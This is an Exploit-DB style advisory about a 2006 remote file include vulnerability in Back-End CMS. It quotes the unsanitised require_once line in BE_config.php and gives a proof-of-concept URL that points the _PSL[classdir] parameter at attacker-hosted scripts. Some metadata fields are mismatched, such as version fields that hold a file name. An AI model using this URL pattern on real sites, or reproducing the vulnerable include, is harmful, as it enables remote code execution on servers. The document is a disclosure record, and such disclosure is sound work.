Back-End CMS - Remote File Include Vulnerabilities

vendor:

CMS

by:

Kacper (Rahim)

8,3

CVSS

HIGH

Remote File Include

CWE

Product Name: CMS

Affected Version From: BE_config.php Line 27-31

Affected Version To: BE_config.php Line 27-31

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Back-End CMS – Remote File Include Vulnerabilities

A remote file include vulnerability exists in BE_config.php Line 27-31, which allows an attacker to include a remote file by passing the _PSL[classdir] parameter in the URL.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
#   Back-End CMS - Remote File Include Vulnerabilities
#   Find by Kacper (Rahim).
#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#   Site of script: http://www.back-end.org
#
####################################################################
*/

BE_config.php Line 27-31:

[code]
...
  // Script timer
  require_once($_PSL['classdir'] . '/BE_phpTimer.class');
  $scriptTimer = & pslSingleton('phpTimer');
  $scriptTimer->start('main');
  /* Use Example
...
[/code]


/*

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-25]